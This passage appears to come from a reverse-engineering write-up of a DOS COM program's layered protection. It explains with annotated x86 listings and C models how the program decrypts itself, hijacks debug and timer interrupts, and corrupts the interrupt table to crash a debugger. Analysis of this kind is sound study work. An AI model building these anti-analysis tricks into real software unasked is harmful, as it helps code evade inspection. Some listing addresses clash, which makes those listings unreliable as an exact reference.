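
typedef struct {
    uint16_t offset;
    uint16_t segment;
} FarPtr;

/* Linear address of the IVT entry for a vector (entry = offset, segment). */
uint16_t ivt_entry_addr(uint8_t vector)
{
    return (uint16_t)(vector * 4u);
}

/* Vector whose entry contains the given linear address (0..1023). */
uint8_t ivt_vector_for_addr(uint16_t addr)
{
    return (uint8_t)(addr / 4u);
}

/* Store a handler into a 1 KiB copy of the IVT, little-endian. */
void ivt_set(uint8_t ivt[1024], uint8_t vector, FarPtr handler)
{
    uint16_t a = ivt_entry_addr(vector);
    ivt[a]     = (uint8_t)(handler.offset & 0xff);
    ivt[a + 1] = (uint8_t)(handler.offset >> 8);
    ivt[a + 2] = (uint8_t)(handler.segment & 0xff);
    ivt[a + 3] = (uint8_t)(handler.segment >> 8);
}
```

In these terms, mov word [4], ax followed by mov word [6], cs is ivt_set(ivt, 1, handler) with handler.offset = 0x070e and handler.segment = cs.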


0000:06c8  9c      pushf       ;
0000:06c9  58      pop ax      ; ax = flags
0000:06ca  80cc01  or ah, 1    ; flags.TF = 1
0000:06cd  50      push ax     ; The code here sets the trap flag -
                               ; int 1 is generated after every instr.
0000:06ce  9d      popf        ; Commit flags


The above code fragment sets the trap flag, which causes a single-step interrupt to be generated after every
following instruction, starting with the call below. Note that the trap flag raises interrupt 1, not the int3
breakpoint interrupt (interrupt 3): interrupt 1 is the vector whose handler address was overwritten a few
instructions earlier. If the program is run inside a debugger, the debugger either loses its single-step vector or,
if it keeps control of it, has its handler invoked after every instruction, which makes debugging harder because
the program starts to single step (until you realize it and unset the TF). It bumps up the skill level necessary to
crack this program with dynamic analysis.
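
The flag manipulation itself is just a bit set on the high byte of FLAGS: bit 0 of ah is bit 8 of the 16-bit flags register, which is TF. A small C sketch of the pushf / pop ax / or ah, 1 / push ax / popf sequence, with names of my own:

```c
#include <stdint.h>

#define FLAGS_TF 0x0100u   /* trap flag: bit 8 of FLAGS */

/* Models the effect of the sequence on a 16-bit FLAGS value. */
uint16_t set_trap_flag(uint16_t flags)
{
    uint8_t al = (uint8_t)(flags & 0xff);   /* pushf; pop ax */
    uint8_t ah = (uint8_t)(flags >> 8);
    ah |= 1;                                /* or ah, 1      */
    return (uint16_t)((ah << 8) | al);      /* push ax; popf */
}
```

Only bit 8 changes; every other flag is written back unmodified, so the program's arithmetic state is not disturbed.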


0000:06cf  e80000  call 0x6d2    ; d2 06 00 01 00 01 00 01 00 01 ?? xx
0000:06d2  5e      pop si        ; si = 6d2
                                 ; stack = 00 01 00 01 00 01 00 01 ?? xx
0000:06d3  83c667  add si, 0x67  ; si = 0x739


We see the call-pop-add sequence again, this time to save the current instruction pointer to the si register, then 
adjust it by a constant. As we will see in a moment, this constant is the distance between the current ip and the end 
of decryption code, so that it points just after the stage 2 demangler, where encrypted stage 3 code resides. 


Now the code proceeds to the main stage 2 code. I’ve commented the listing and will go through it in detail: 
;; si = 0x739
;; ds, es segment registers are loaded with the segment COM is resident at (cs)
;; stack = 00 01 00 01 00 01 00 01 ?? xx


;-- stage2:
0000:06d6  90        nop
0000:06d7  8bde      mov bx, si     ; bx = 739
0000:06d9  53        push bx        ; 39 07 00 01 00 01 00 01 00 01 ?? xx
0000:06da  e80000    call 0x6dd     ; dd 06 39 07 00 01 00 01 00 01 00...
0000:06dd  5a        pop dx         ; dx = 6dd
0000:06de  81c21703  add dx, 0x317  ; dx = 9f4
0000:06e2  8bda      mov bx, dx     ; bx = 9f4
0000:06e4  81c3ee01  add bx, 0x1ee  ; bx = be2
0000:06e8  fc        cld            ; Clear dir flag
0000:06e9  8bfe      mov di, si     ; di <- si; di = 0x739
0000:06eb  b9bb02    mov cx, 0x2bb  ; cx = 2bb
0000:06ee  33c0      xor ax, ax     ; ax = 0; al = 00 ah = 00


The above snippet does some final preparations for the decryption loop. We have another call-pop-add
sequence to load the dx register with a pointer to what will be one of the keys for the algorithm. cx is loaded
with a constant value that will be used to count the iterations of the algorithm.
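
All of the pointers set up so far come from the same call-pop-add pattern, so they can be recomputed from the return addresses and constants in the listings. The following C sketch does exactly that; the struct and function names are hypothetical, and the numbers are taken from the annotated disassembly:

```c
#include <stdint.h>

typedef struct {
    uint16_t handler;   /* offset written to the IVT at [4]   */
    uint16_t si, di;    /* read and write pointers            */
    uint16_t dx;        /* pointer to the second key          */
    uint16_t bx;        /* end marker for the second key      */
    uint16_t cx;        /* loop counter                       */
    uint8_t  al, ah;    /* cleared by xor ax, ax              */
} Stage2Regs;

/* call next; pop reg; add reg, delta  ==>  reg = return_ip + delta */
static uint16_t call_pop_add(uint16_t return_ip, uint16_t delta)
{
    return (uint16_t)(return_ip + delta);
}

Stage2Regs stage2_prelude(void)
{
    Stage2Regs r;
    r.handler = call_pop_add(0x06b9, 0x0055);   /* call 0x6b9; pop ax; add ax, 0x55  */
    r.si      = call_pop_add(0x06d2, 0x0067);   /* call 0x6d2; pop si; add si, 0x67  */
    r.dx      = call_pop_add(0x06dd, 0x0317);   /* call 0x6dd; pop dx; add dx, 0x317 */
    r.bx      = (uint16_t)(r.dx + 0x01ee);      /* mov bx, dx; add bx, 0x1ee         */
    r.di      = r.si;                           /* mov di, si                        */
    r.cx      = 0x02bb;                         /* mov cx, 0x2bb                     */
    r.al      = 0;
    r.ah      = 0;
    return r;
}
```

One detail falls out of the arithmetic: si + cx = 0x739 + 0x2bb = 0x9f4, which is the value loaded into dx, so with these numbers the second key begins at the first byte after the 0x2bb bytes that the loop processes.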


Notice the nop instruction at the start of this snippet. I have a feeling the author needed to pad the code by just one
byte? I think there might be some room for improvement here :)


Anyway, off to the decryption code. The registers at the beginning are as follows, with 
their functions described: 


;; Regs at start: al=0; ah=0; dx=9f4; bx=be2; si=0x739; di=0x739; cx=2bb;
;; al - payload byte
;; ah - rolling key (incremented each byte)
;; si and di - target r & w pointers
;; dx - key2 pointer
;; bx - constant value of 0xbe2 (not written)
;; cx - loop counter for loop insn


;; Main demangle loop: al is the byte operated on. This is a dual XOR routine
;; First XOR key is sequential from 0.
;; Second XOR key takes the bytes between 9cc and bba.


.->   0000:06f0  ac        lodsb al, byte [si]     ; al = payload byte; si++
:     0000:06f1  32c4      xor al, ah              ; Xor with ah
:     0000:06f3  e82f00    call 0x725              ; Call the stage 2 demangle func.
:     ;; St2 demangle function
:     0000:0725  56        push si                 ; Save si
:     0000:0726  8bf2      mov si, dx              ; si <- dx
:     0000:0728  3bf3      cmp si, bx              ; bx =? dx; dx =? 0xbe2
:     ;; This clause will set dx to 0x9f4 if dx == bx (dx == 0xbe2)
: ,-< 0000:072a  7508      jne 0x734
: |   ; This executes if si == bx.
: |   0000:072c  8bf3      mov si, bx              ; si <- 0xbe2
: |   0000:072e  81eeee01  sub si, 0x1ee           ; si <- 0xbe2 - 0x1ee = 0x9f4
: |   0000:0732  8bd6      mov dx, si              ; dx <- si, dx = 0x9f4
: `-> 0000:0734  3204      xor al, byte [si]       ; key2 xor; al ^= *(dx)
:     0000:0736  42        inc dx
:     0000:0737  5e        pop si
:     0000:0738  c3        ret
:     0000:06f6  fec4      inc ah                  ; Increase key
:     0000:06f8  aa        stosb byte es:[di], al  ; Store decrypted byte
`-<   0000:06f9  e2f5      loop 0x6f0              ; jmp 0x6f0 if --cx != 0


This is a long snippet but it forms a logical block. Let’s run it down instruction by instruction: 


0000:06f0 ac          lodsb al, byte [si]      ; al = ciphertext; si++
0000:06f1 32c4        xor al, ah


First we load a byte from the address in si to the register al. This is our ciphertext byte. si is automatically
incremented by the lodsb instruction. Then we xor it with ah. (al <= al xor ah)


0000:06f3 e82f00      call 0x725               ; Call the stage 2 demangle function


A call to a subroutine (function) is made. Let’s break the function down: 


0000:0725 56          push si                  ; Save si
0000:0726 8bf2        mov si, dx               ; si <- dx


We save si on the stack, then copy dx into it. 


0000:0728 3bf3        cmp si, bx               ; bx =? dx; dx =? 0xbe2
0000:072a 7508        jne 0x734
;; This executes if si == bx.
0000:072c 8bf3        mov si, bx               ; si <- 0xbe2
0000:072e 81eeee01    sub si, 0x1ee            ; si <- 0xbe2 - 0x1ee = 0x9f4
0000:0732 8bd6        mov dx, si               ; dx <- si, dx = 0x9f4


Compare the dx value (which is now in si) with bx. bx is a constant of 0xbe2 (it is not written to in the entire loop).
If the values are equal, the jne is not taken and dx is rolled back to 0x9f4, its original value set at 0x6e2. If the
jump is taken, execution skips to 0x734:


0000:0734 3204        xor al, byte [si]        ; key2 xor; al ^= *(dx)
0000:0736 42          inc dx
0000:0737 5e          pop si
0000:0738 c3          ret


Now our ciphertext byte is xored again, this time with a byte pointed to by si. si still contains the dx value (in either
case of the jump). Then dx is incremented, si is restored by the pop instruction to its previous value and the
subroutine ends, jumping back to 0x6f6:


0000:06f6 fec4        inc ah                   ; Increase key


ah, which contains the rolling key value, is incremented.


0000:06f8 aa          stosb byte es:[di], al   ; di++


The processed ciphertext byte (which is now cleartext) is stored at es:di, then di is incremented (stosb is a string
operation which does all this in one instruction).


0000:06f9 e2f5        loop 0x6f0               ; jmp 0x6f0 if --cx != 0


The loop instruction decrements cx and, if it's not zero, the code jumps back to 0x6f0 to process the next ciphertext
byte. Notice that the si and di values at the start are identical, so the code overwrites the ciphertext with the
cleartext (it decrypts it in place).


This function can be expressed in C like this: 


uint16_t si = 0x739;
uint16_t di = 0x739;
uint8_t key = 0;
uint16_t key2 = 0x9f4;
uint16_t cx = 0x2bb;
uint8_t x;
const uint16_t bx = 0xbe2;

do {
    x = memory[si]; si++;
    x = x ^ key;

    if (bx == key2) {
        key2 = bx - 0x1ee;
    }

    x = x ^ memory[key2];
    key2++;
    key++;
    memory[di] = x; di++;
    cx--;
} while (cx != 0);
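

For anyone who wants to replay stage 2 outside of a debugger, here is a minimal compilable sketch of the same loop. It assumes the whole segment has been loaded into a flat 64 KiB byte array; the function name and its parameters are made up for this example (they stand in for si/di, cx, dx and bx), and unlike the x86 loop instruction it does nothing when the count is zero.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: in-place dual-XOR pass over a flat memory image.
   start  ~ si/di (0x739), count  ~ cx (0x2bb),
   key_lo ~ dx (0x9f4),    key_hi ~ bx (0xbe2, one past the last key byte). */
static void stage2_demangle(uint8_t *memory, uint16_t start, uint16_t count,
                            uint16_t key_lo, uint16_t key_hi)
{
    uint16_t si = start;      /* read and write pointer (decrypts in place) */
    uint16_t key2 = key_lo;   /* pointer into the second key table */
    uint8_t key = 0;          /* rolling key, wraps at 0xff like ah */

    assert(key_lo < key_hi);

    while (count-- != 0) {
        uint8_t x = (uint8_t)(memory[si] ^ key);  /* xor al, ah */
        if (key2 == key_hi)                       /* cmp si, bx */
            key2 = key_lo;                        /* roll back to table start */
        x ^= memory[key2];                        /* xor al, byte [si] */
        key2++;                                   /* inc dx */
        key++;                                    /* inc ah */
        memory[si] = x;                           /* stosb */
        si++;
    }
}
```

With the values from the listing the call would be stage2_demangle(memory, 0x739, 0x2bb, 0x9f4, 0xbe2). Since 0x739 + 0x2bb = 0x9f4, the decrypted region ends right where the key table begins, so the keys themselves are never modified. Because both steps are plain XOR, running the function twice over the same range restores the original bytes.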


After the function is done, the code will prepare the registers for stage 3. Note that the stack is preserved by the 
decryption loop. 


0000:06d3 5b          pop bx           ; bx = 739;  stack = 00 01 00 01 00 01...
0000:06d4 07          pop es           ; es = 0100; stack = 00 01 00 01 00 01...
0000:06d5 1f          pop ds           ; ds = 0100; stack = 00 01 00 01 ?? xx
0000:06d6 5f          pop di           ; di = 0100; stack = 00 01 ?? xx
0000:06d7 5e          pop si           ; si = 0100; stack = ?? xx
0000:06d8 59          pop cx           ; cx = ??xx; stack = <empty>


These pop instructions are in exactly the reverse order of the series of pushes at 0x6ae, except for the first
instruction (pop bx). They restore the segment registers, di, si and cx to their values before stage 2. However, the
first instruction pops what was the pointer to the encrypted/decrypted code into bx, so now bx contains the pointer
to stage 3 code.


0000:06d9 83c310      add bx, 0x10     ; bx = 0x749
0000:06dc 8cc8        mov ax, cs       ; ax = 0x100 (cs not written to so far)
0000:06de 48          dec ax           ; ax = 0x0ff


The next part is a clever trick to further confuse the hacker who wants to analyze this code. First, a constant of 0x10 
is added to bx (which points to the stage 3 code). Then cs is copied to ax, and ax is decremented by 1. 


0000:06df 50          push ax          ; stack = ff 00
0000:06e0 53          push bx          ; stack = 49 07 ff 00
0000:06e1 33db        xor bx, bx       ; bx = 0
0000:06e3 33c0        xor ax, ax       ; ax = 0
0000:06e5 cb          retf             ; Pull address from stack and return,
                                       ; go to stage 3 entry point


Here the trick happens: ax and bx are pushed onto the stack, then they are zeroed and a far return is executed. The
far return is different from a near return in that it also pulls the new code segment value from the stack. This will
cause the code to do a long jump (intersegment jump) to the pushed ax:bx pair. But just a moment ago, these values
were changed in a specific way. The segment was decremented, and 0x10 was added to the offset.


In practice the actual return address did not change. The offset and segment values were changed in such a way that
the segment:offset pair still points to the same place. This is because of how the x86's segmented memory model works.


In the segmented memory model (real mode), the linear address is calculated by shifting the segment value 4 bits
to the left and adding the offset to it. This means that increasing the offset by 0x10 (decimal 16) and decrementing
the segment by 1 are opposite operations, and the result is unchanged. See the example below:


  0x 00ff0   segment 0x00ff shifted << 4
+ 0x 0749    offset
= 0x 01739   logical/linear memory address


But this address also maps to 0100:0739:


  0x 01000   segment 0x0100 shifted << 4
+ 0x 0739    offset
= 0x 01739
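

The same arithmetic as a tiny C helper, in case you want to check other segment:offset pairs while following along. This is just a sketch: the function name is invented for the example, and the 20-bit mask assumes the classic 8086 behaviour where addresses wrap at 1 MiB (no A20 line).

```c
#include <assert.h>
#include <stdint.h>

/* Real-mode address translation: linear = (segment << 4) + offset.
   The mask models a 20-bit address bus (an assumption of this sketch). */
static uint32_t linear_address(uint16_t segment, uint16_t offset)
{
    return (((uint32_t)segment << 4) + offset) & 0xFFFFFu;
}
```

Both linear_address(0x00ff, 0x0749) and linear_address(0x0100, 0x0739) evaluate to 0x1739, which is why the retf lands on the same byte even though cs and ip look different.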


The entry point to stage 3 is at 00ff:0749 (or 0100:0739). But before we look there, let's come back to the two mov
instructions at 6bd and 6c0 that we skipped, and the code before them. They move two registers into addresses 4
and 6 in the data segment.


0000:06b3 6a00        push 0           ; stack = 00 00
0000:06b5 1f          pop ds           ; ds = 0000; stack = <empty>
0000:06b6 e80000      call 0x6b9       ; stack = b9 06
0000:06b9 58          pop ax           ; ax = 6b9
0000:06ba 055500      add ax, 0x55     ; ax = 70e


;; These two lines write ax and cs to the offset and segment fields of the
;; Interrupt Vector Table INT1. INT1 is the interrupt that handles debugging.
;; This will cause code at cs:070e to be executed when a breakpoint hits


0000:06bd a30400      mov word [4], ax
0000:06c0 8c0e0600    mov word [6], cs
0000:06c4 0e          push cs          ; Set ds = cs and es = cs
0000:06c5 1f          pop ds           ; (restore es and ds values
0000:06c6 0e          push cs          ; for self modifying code)
0000:06c7 07          pop es


The push 0; pop ds pair sets the data segment pointer to zero. In most CPUs, the addresses close to zero hold a
lot of important values. In x86 real mode, that is where the Interrupt Vector Table (IVT) resides. The IVT contains
4-byte segment:offset pointers to consecutive interrupt service routines. Addresses 0000:0004 and 0000:0006 contain
the vector for Interrupt 1, “Debug Exceptions”. This service routine is executed whenever a breakpoint is hit. The
debugger installs its own service routine there (that is, writes the segment and offset to it) to take action when a
debug breakpoint is hit. In this stage, the program becomes more defensive about being dynamically analyzed by
hijacking the debugger's interrupt vector to its own code.
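

Since the sample pokes at several vectors this way, it helps to have the address math at hand. A small sketch follows; the helper names are made up for illustration. Each real-mode vector occupies 4 bytes, with the offset word first and the segment word second.

```c
#include <assert.h>
#include <stdint.h>

/* Address (within segment 0000) of the offset word of interrupt vector n. */
static uint16_t ivt_offset_field(uint8_t vector)
{
    return (uint16_t)(vector * 4u);
}

/* Address (within segment 0000) of the segment word of interrupt vector n. */
static uint16_t ivt_segment_field(uint8_t vector)
{
    return (uint16_t)(vector * 4u + 2u);
}
```

For INT1 this gives 4 and 6, matching the two mov instructions. The same formula gives 0x20 and 0x22 for INT8, and 0x18 and 0x1a for INT6.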


INT1 is one of the two debug interrupts for x86. There are two interrupts for flexibility, and for things like debugging
the debuggers. The simpler debug interrupt is INT3, which is made special by having a one-byte opcode, 0xcc,
reserved for it (it's the INT 3 opcode). This allows you to place that opcode anywhere in memory, and because
it's only one byte, it will never cause a page fault. Software debuggers use it when you place a breakpoint. The other
interrupt is INT1, which is for hardware debugging. INT1 is called by hardware when one of the addresses saved in
the 4 debug registers (dr0 to dr3) matches the breakpoint conditions set in dr7. This is what lower level debuggers use.
On DOS, the program has full hardware access so debuggers can use either or both mechanisms.


Nowadays user-level debuggers use INT3 because it's available from userspace - it causes a SIGTRAP on unix
systems, and calls the debug handler on NT (whatever that means, I could not find a definite answer). Hardware
debug is reserved for the kernel and ring 0 code.


This is the new debug interrupt handler at 70e that is registered by the code at 6bd:


0000:070e 6650        push eax
0000:0710 6633c0      xor eax, eax
0000:0713 0f23f8      mov dr7, eax
0000:0716 0f23c0      mov dr0, eax
0000:0719 0f23c8      mov dr1, eax
0000:071c 0f23d0      mov dr2, eax
0000:071f 0f23d8      mov dr3, eax
0000:0722 6658        pop eax
0000:0724 cf          iret


It zeroes out all relevant debug registers, which effectively disables all breakpoints, and returns to the code. This
interesting anti-reversing technique impacts dynamic analysis by preventing any (software) debugger from tracing
the code, as the breakpoints set will not hit unless the breakpoint handler is re-registered by the debugger.


Stage 3


Stage 3 starts with more stack operations. It saves all general purpose registers with pushaw, as well as ds and es 
segments. It then sets ds to 0000. 


; Int 1 at 70e is still active - trap flag is set
; --- stage 3 entry point


0000:0749 fa          cli              ; Disable external interrupts
0000:074a 60          pushaw           ; stack = 00 01 00 01 bpL bpH spL spH ...
0000:074b 1e          push ds          ; stack = 00 01 00 01 00 01 bpL bpH ...
0000:074c 06          push es          ; stack = 00 01 00 01 00 01 00 01 bpL...
0000:074d 6a00        push 0           ; stack = 00 00 00 01 00 01 00 01 00...
0000:074f 1f          pop ds           ; ds = 0000; stack = 00 01 00 01 00 01...


Then, the trap flag is checked. At the same time an anti-disassembly trap is set up. The jmp 0x757 skips one byte,
so the instructions that follow are offset. Most disassemblers will choke on this. I had to move the cursor in radare2
to 0x757 so that it disassembled the instructions correctly. Once you get past this trick, the code is revealed to
check whether TF (trap flag) was unset and, if so, “adjust” the stack pointer by 0x100. This way the program will soon
crash if you were examining this part in a debugger and disabled the trap flag.


0000:0750 9c            pushf
;; stack = flL flH 00 01 00 01 00 01 00 01 bpL bpH spL spH 00 00 dl dh ?? ch 00 00
0000:0751 58            pop ax                   ; ax = flags ; stack = 00 01 00 01 00 01..
0000:0752 f7d0          not ax                   ; ax = ~flags
0000:0754 eb01          jmp 0x757


;; This is not a jump to next instruction (eb00),
;; it skips one byte (eb01)! These instructions do not make sense.
0000:0756 9a25000103    lcall 0x301:0x25         ; Decoy - not a real insn
0000:075b e0a1          loopne 0x6fe             ; Decoys
0000:075d 2000          and byte [bx + si], al   ; Decoys


;; This is what the disassembler produces when
;; started at the correct address (0x757)
0000:0757 250001        and ax, 0x100            ; ax = 0x100 if TF=0, 0x0 if TF=1
0000:075a 03e0          add sp, ax               ; Roll stack back 0x100 if trap flag
                                                 ; was unset at 750
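

The not/and/add triplet is easy to misread, so here is the same computation as a C sketch. The function name is made up; the only hard fact it relies on is that TF is bit 8 (mask 0x100) of the flags register.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors: pushf / pop ax / not ax / and ax, 0x100 / add sp, ax.
   Returns the stack pointer value after the check. */
static uint16_t sp_after_tf_check(uint16_t sp, uint16_t flags)
{
    uint16_t ax = (uint16_t)~flags;  /* not ax: TF bit is now inverted */
    ax &= 0x0100;                    /* 0x100 if TF was clear, 0 if it was set */
    return (uint16_t)(sp + ax);      /* add sp, ax */
}
```

With TF set the stack pointer is left alone; with TF clear it moves by 0x100, so every later pop and the final return read garbage.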


Next up the code saves the value of the interrupt 8 handler. The old interrupt vector is saved at si+0x490 and
si+0x492, which is an area at the very end of the loaded COM file (the file ends at 0xbed). Bytes 0xbf2-0xbfd contain
zeros; they are reserved for storing stuff.


;; Save INT8's segment:offset address at si+0x490 and si+0x492 (0xbf2:0xbf4)


0000:075c a12000        mov ax, word [0x20]            ; Load offset address
0000:075f e80000        call 0x762
0000:0762 5e            pop si                         ; si = 0x762
0000:0763 2e89849004    mov word cs:[si + 0x490], ax   ; Save offset address
0000:0768 a12200        mov ax, word [0x22]            ; Load segment address
0000:076b 2e89849204    mov word cs:[si + 0x492], ax   ; Save segment address


Then it redefines the PIT's interrupt handler to be at cs:07e4:


0000:0770 8bc6        mov ax, si            ; ax = si
0000:0772 50          push ax               ; stack = 62 07 00 01...
0000:0773 058200      add ax, 0x82          ; ax = 7e4
0000:0776 a32000      mov word [0x20], ax
0000:0779 8c0e2200    mov word [0x22], cs   ; Set cs:07e4 as INT8


Interrupt 8 is reserved for “Double Fault” in the CPU (a handler for servicing a fault inside an exception handler).
However, due to an oversight by the IBM PC's engineering team, some of the first 0x1f interrupts were assigned to
devices outside of the CPU itself. INT8 on the PC is the Programmable Interval Timer interrupt. We will come back to
what the handler does in a moment. For now let's just continue with our analysis.


The program loads two words from IO port 0x40, which is the PIT's timer value (it changes continuously as the timer
counts). These two words are set as the segment:offset of interrupt 7's address. Interrupt 7 is “Coprocessor Not
Available” and is triggered when a coprocessor instruction is executed but there is no coprocessor. On the IBM PC,
the coprocessor is an x87 floating point unit. The x87 is included on die in all x86 CPUs after 386. The code sets
these (random) values as the interrupt handler, then executes an FPU NOP. If the FPU is not available, it will trigger
the interrupt and crash the system. Why it's doing this is unknown to me. Maybe it's to prevent running the program
on FPU-less machines. It might also be an anti-virtualization measure, to catch some simple hypervisors of the era
that did not emulate (restore/save) the FPU (and the FPU not available flag was set).


Either way, this part of the code prevents running the program on FPU-less machines. 


;; Check for FPU, crash if it's not there.


0000:077d e540        in ax, 0x40           ; Load timer count
0000:077f a31c00      mov word [0x1c], ax   ; Set offset
0000:0782 e540        in ax, 0x40
0000:0784 a31e00      mov word [0x1e], ax   ; Set segment
0000:0787 d9da        fnop                  ; Trigger fault


When the FPU check passes, the code redefines the invalid instruction interrupt, Interrupt 6 “Invalid Opcode”: 


0000:0789 58          pop ax                ; Pop saved ax = 0x762
0000:078a 50          push ax               ; Push it back
0000:078b 05d400      add ax, 0xd4          ; ax = 0x836
0000:078e a31800      mov word [0x18], ax
0000:0791 8c0e1a00    mov word [0x1a], cs   ; Set INT6 to cs:0836


The code at cs:0836 will be called whenever the processor attempts to execute an invalid instruction. On this error, 
the processor will push eflags, cs and ip to the stack and execute the handler. Let’s take a look at what the new 
handler is: 


;; INT6 handler set at cs:0791
;; stack words = ip cs flags


0000:0836 0f23d0      mov dr2, eax           ; Overwrite breakpoint 2
0000:0839 55          push bp                ; Save bp
0000:083a 8bec        mov bp, sp
0000:083c 83460202    add word [bp + 2], 2   ; Add 2 to saved ip
0000:0840 5d          pop bp                 ; Restore bp
0000:0841 cf          iret                   ; Return from interrupt
                                             ; (pop ip, pop cs, pop flags)


This handler will simply advance the saved instruction pointer by two bytes past the erroneous instruction, and
resume the code execution. It will also overwrite the breakpoint address set in dr2.


Continuing our analysis after the invalid opcode interrupt was installed we arrive at some code that clears the trap 
flag: 


0000:0795 9c          pushf
0000:0796 58          pop ax
0000:0797 25fffe      and ax, 0xfeff   ; Clear trap flag
0000:079a 50          push ax
0000:079b 9d          popf


And then redefines the debug handler again. 


0000:079c 58          pop ax             ; ax = 0x762
0000:079d 053701      add ax, 0x137      ; ax = 0x899
0000:07a0 a30400      mov word [4], ax
0000:07a3 8c0e0600    mov word [6], cs   ; Set cs:0899 as INT1


As we will see in a moment, the code at 899 is still encrypted, so there is no point trying to understand it yet. This
means that hitting any breakpoint here will crash the computer, as the CPU tries to execute encrypted code. (It's
hard to say whether it's the program or the debugger that will crash, since DOS is a single-tasking OS.)


The next part of stage 3 code is perhaps the most interesting. It's another anti-RE technique that makes dynamic
analysis harder, if not impossible, using regular tools. The code calls BIOS int 1Ah ah=0x02 to get the RTC time, runs
a few instructions that have no effect (apart from breaking the dr1 breakpoint) and then compares the RTC
time...


;; Get RTC time and save second count


0000:07a7 b402        mov ah, 2
0000:07a9 cd1a        int 0x1a         ; INT 1A, AH=0x02: get RTC time
0000:07ab 52          push dx          ; Push seconds (dh) + DST flag (dl)


;; Reprogram PIT channel 1


0000:07ac b0b6        mov al, 0xb6     ; al = 0xb6 = 0b10110110
0000:07ae e643        out 0x43, al     ; Set PIT: ch1, access lo/hi,
0000:07b0 b002        mov al, 2        ; mode 2, 16b binary mode
0000:07b2 e640        out 0x40, al
0000:07b4 e640        out 0x40, al     ; Set 0x0202 as timer 0 reload value


;; The program changes timer 1 mode but writes timer 0 value!


0000:07b6 0f20c0      mov eax, cr0     ; Mangle cr0 through dr1
0000:07b9 0f23c8      mov dr1, eax     ; (this does not change cr0)
0000:07bc 0f21cb      mov ebx, dr1
0000:07bf 0f22c3      mov cr0, ebx


;; Get RTC time again and save second count


0000:07c2 b402        mov ah, 2
0000:07c4 cd1a        int 0x1a         ; INT 1A, AH=0x02: get RTC time
0000:07c6 58          pop ax           ; ax = previous sec count (ah),
                                       ; and dst flag (al)
0000:07c7 2af4        sub dh, ah       ; Subtract old seconds count

At the end of this code, register dh contains the seconds difference of wall clock time between the execution of 7a9
and 7c4. If a debugger halted the program at that time, for example because of a breakpoint set at cr0, then the dh
register will be non zero.


Then the program executes this loop, which will XOR every third byte in a region with dh value... 


0000:07c9 b98400          mov cx, 0x84        ; cx = 0x84
0000:07cc 33ff            xor di, di          ; di = 0
.-> 0000:07ce 3035        xor byte [di], dh   ; 0000:0000 ^= dh
:   0000:07d0 83c703      add di, 3           ; di += 3
`-- 0000:07d3 e2f9        loop 0x7ce          ; Loop back


...but ds is still 0000, and with di initially set to zero, this loop will xor every third byte of the IVT, 0x84 bytes in
total. With a stride of 3 against 4-byte vectors, at least one byte of each of the first 99 interrupt vectors is hit. If dh
is non zero this will effectively crash the system, as some of these interrupts are executed even when the system
is idle.
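

To see how much damage a non-zero dh does, the loop can be replayed on a dummy table. The sketch below is a model under stated assumptions: a zeroed 1 KiB array stands in for the real IVT, and the function name is invented for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Replays the loop at 07c9..07d3 on a zeroed stand-in for the IVT and
   returns how many 4-byte vectors have at least one changed byte. */
static unsigned corrupted_vectors(uint8_t dh)
{
    uint8_t ivt[1024] = {0};
    uint16_t di = 0;                             /* xor di, di */
    unsigned changed = 0;

    for (uint16_t cx = 0x84; cx != 0; cx--) {    /* loop 0x7ce */
        ivt[di] ^= dh;                           /* xor byte [di], dh */
        di += 3;                                 /* add di, 3 */
    }
    assert(di == 0x84 * 3);                      /* 0x18c bytes walked */

    for (unsigned v = 0; v < 256; v++) {
        if (ivt[4 * v] | ivt[4 * v + 1] | ivt[4 * v + 2] | ivt[4 * v + 3])
            changed++;
    }
    return changed;
}
```

corrupted_vectors(0) leaves the table untouched, which is the normal, undebugged path. Any non-zero value damages vectors 0 through 98, and that range includes the timer and keyboard interrupts.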


After this anti debugging trap, the code goes on: 


0000:07d5 0e          push cs
0000:07d6 1f          pop ds                      ; ds = cs
0000:07d7 8bc6        mov ax, si                  ; ax = 0x762
0000:07d9 05e000      add ax, 0xe0                ; ax = 0x842
0000:07dc 89849404    mov word [si + 0x494], ax   ; 0x0bf6 = 42, 0x0bf7 = 08
0000:07e0 fb          sti                         ; Enable ext. interrupts
0000:07e1 eb3f        jmp 0x822                   ; Jump to invalid instr.


It sets ds to cs, which as we’ve seen previously, indicates there will be operations on the code segment in memory. 
The code loads a pointer into a predefined place near the end of code memory, just after the saved interrupt 8 value. 
Then it enables interrupts with sti and jumps to 0x822.. 


0000:0822 ff          invalid
0000:0823 ff          invalid
0000:0824 ebfc        jmp 0x822        ; jump back to the invalid instruction


..which is an undefined instruction (ff). The illegal instruction handler will advance ip by 2, so the next instruction that 
is executed is at 824, which is a jump back to 822. At this point the code will loop indefinitely handling the invalid 
instruction and jumping back to it. 


Or will it?


We didn't look at the PIT's interrupt handler that was set at 779. Let's see what that part does:


;; Assuming this will occur while the #UD interrupt is looping, then registers are
;; like they were at 7e1.
;; si = 0x762, constant in this fragment

;; Stage 3 decryption loop
;; word cs:[si + 0x494] is the ciphertext pointer. We are in the interrupt handler.
;; Stack =
;;                 -es- -ds- -di- -si-
;;    ip cs eflags 0100 0100 0100 0100 bp sp 0000 dx cx ax
;;    ^--- Top of stack (sp)


;; load di with ciphertext pointer
     0000:07e4 2e8bbc9404    mov di, word cs:[si + 0x494]

;; On the first run it's the ax saved at 7dc; di = 0x842

     0000:07e9 8bc6          mov ax, si               ; ax = 0x762
     0000:07eb 05a202        add ax, 0x2a2            ; ax = 0xa04
     0000:07ee 3bf8          cmp di, ax
.--- 0000:07f0 7522          jne 0x814                ; Skip the code if not
`--> 0000:0814 0e            push cs                  ; We know this one, ds = cs
     0000:0815 1f            pop ds
     0000:0816 803501        xor byte [di], 1         ; Decrypt ciphertext byte
     0000:0819 ff849404      inc word [si + 0x494]    ; Increase the ciphertext ptr
     0000:081d b020          mov al, 0x20
     0000:081f e620          out 0x20, al             ; Primary PIC command 20, EOI
     0000:0821 cf            iret                     ; Finish “servicing” the ISR
                                                      ; Pull ip, cs, eflags.


;; This code executes after the decryption is done (jne at 0x7f0 is not taken)


     0000:07f2 6a00          push 0
     0000:07f4 1f            pop ds                         ; ds = 0000
     0000:07f5 fa            cli                            ; disable ext. interrupts
     0000:07f6 2e8b849004    mov ax, word cs:[si + 0x490]   ; si+490 = bf2
     0000:07fb a32000        mov word [0x20], ax
     0000:07fe 2e8b849204    mov ax, word cs:[si + 0x492]   ; si+492 = bf4
;; restore INT8 (PIT) segment:offset from bf2:bf4
     0000:0803 a32200        mov word [0x22], ax
